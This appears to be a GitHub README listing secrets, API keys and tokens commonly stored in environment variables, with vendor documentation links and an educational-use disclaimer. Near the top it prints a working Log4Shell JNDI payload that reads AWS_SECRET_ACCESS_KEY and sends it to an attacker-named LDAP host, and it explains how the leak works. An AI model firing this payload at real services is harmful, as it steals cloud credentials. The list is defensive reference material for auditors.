🦄🔒 Awesome list of secrets in environment variables 🖥️
A list of secrets, passwords, API keys and tokens that are commonly stored in system environment variables.
An environment variable is a variable whose value is set outside the program, typically through functionality built into the operating system or microservice.
Much developer documentation recommends storing secrets in environment variables, but is that really the best way to keep secrets?
An attacker can read the values of system environment variables by using exploits such as:
CVE-2021-44228, Log4j JNDI lookup (Java) (Read more...)
${jndi:ldap://somesitehackerofhell.com/z?leak=${env:AWS_SECRET_ACCESS_KEY:-NO_EXISTS}}
The nested ${env:...} lookup is resolved first: it returns the value of AWS_SECRET_ACCESS_KEY, or the default NO_EXISTS if the variable is not set. Either way, the result becomes part of the LDAP URL that the JNDI lookup sends to the attacker's server.
CVE-XXXX-XXXX Web browser attack (Writeup/POC coming soon to my Github - Follow me on Github and Twitter 😉)
and much more...
Because of that, I created a list of secrets commonly found in environment variables to help secure software.
Some practices that help avoid leaking secrets stored in environment variables are:
You can check your system environment variables with:
Windows (PowerShell): dir env:
Linux/macOS: printenv or env
source: https://docs.aws.amazon.com/sdkref/latest/guide/setting-global-aws_secret_access_key.html
source: https://www.algolia.com/doc/framework-integration/symfony/getting-started/installation/?client=php
source: https://docs.microsoft.com/en-us/dotnet/api/azure.identity.environmentcredential?view=azure-dotnet
source: https://techcommunity.microsoft.com/t5/azure-developer-community-blog/understanding-azure-msi-managed-service-identity-tokens-caching/ba-p/337406
source: https://algotrading101.com/learn/binance-python-api-guide/
source: https://github.com/TeamWertarbyte/crypto-trading-bot/blob/development/README.md
source: https://cli.cloudfoundry.org/en-US/v6/auth.html
source: https://docs.codeclimate.com/docs/command-line-interface
source: https://docs.coveralls.io/supported-ci-services
source: https://circleci.com/docs/2.0/api-developers-guide/
source: https://github.com/digitalocean/doctl#authenticating-with-digitalocean
source: https://github.com/marketplace/actions/publish-docker
source: https://circleci.com/docs/2.0/env-vars/
source: https://github.com/phatblat/fastlane-variables
source: https://firebase.google.com/docs/cli
source: https://docs.fossa.com/docs/api-reference
source: https://cli.github.com/manual/gh_help_environment
source: https://docs.gitlab.com/ee/user/project/deploy_tokens/
source: https://cloud.google.com/docs/authentication/getting-started#windows
source: https://docs.gitlab.com/ee/ci/variables/predefined_variables.html
source: https://devcenter.heroku.com/articles/authentication
source: https://www.pulumi.com/registry/packages/mailgun/installation-configuration/
source: https://docs.mongodb.com/mongocli/stable/configure/environment-variables/
source: -
source: https://docs.npmjs.com/using-private-packages-in-a-ci-cd-workflow
source: https://developer.okta.com/okta-sdk-java/apidocs/com/okta/sdk/client/ClientBuilder.html
source: https://docs.openstack.org/ocata/user-guide/common/cli-set-environment-variables-using-openstack-rc.html
source: https://docs.oracle.com/cd/E78305_01/E78304/html/openstack-envars.html
source: https://docs.percy.io/docs/environment-variables
source: https://www.postgresql.org/docs/current/libpq-envars.html
source: https://docs.saucelabs.com/basics/environment-variables/
source: https://docs.sentry.io/product/cli/configuration/
source: https://slack.dev/node-slack-sdk/getting-started
source: https://www.npmjs.com/package/square/v/12.0.0?activeTab=readme
source: https://stripe.com/docs/cli/api_keys
source: https://surge.sh/help/integrating-with-circleci
source: https://www.twilio.com/blog/2017/01/how-to-set-environment-variables.html
source: https://developer.twitter.com/en/docs/authentication/guides/authentication-best-practices
source: https://docs.travis-ci.com/user/environment-variables
source: https://www.vaultproject.io/docs/commands
source: https://www.vultr.com/docs/deploying-javascript-unikernels-to-vultr-with-ops
The repository includes the raw list:
It is auto-generated from README.md by a GitHub Action.
👍🎉 First off, thanks for taking the time to contribute! 🎉👍
If you would like to add more secrets:
Please read and follow our Contributing guide
Thanks! 🦄
This project can only be used for educational purposes. Using this software against target systems without prior permission is illegal, and any damages from misuse of this software will not be the responsibility of the author.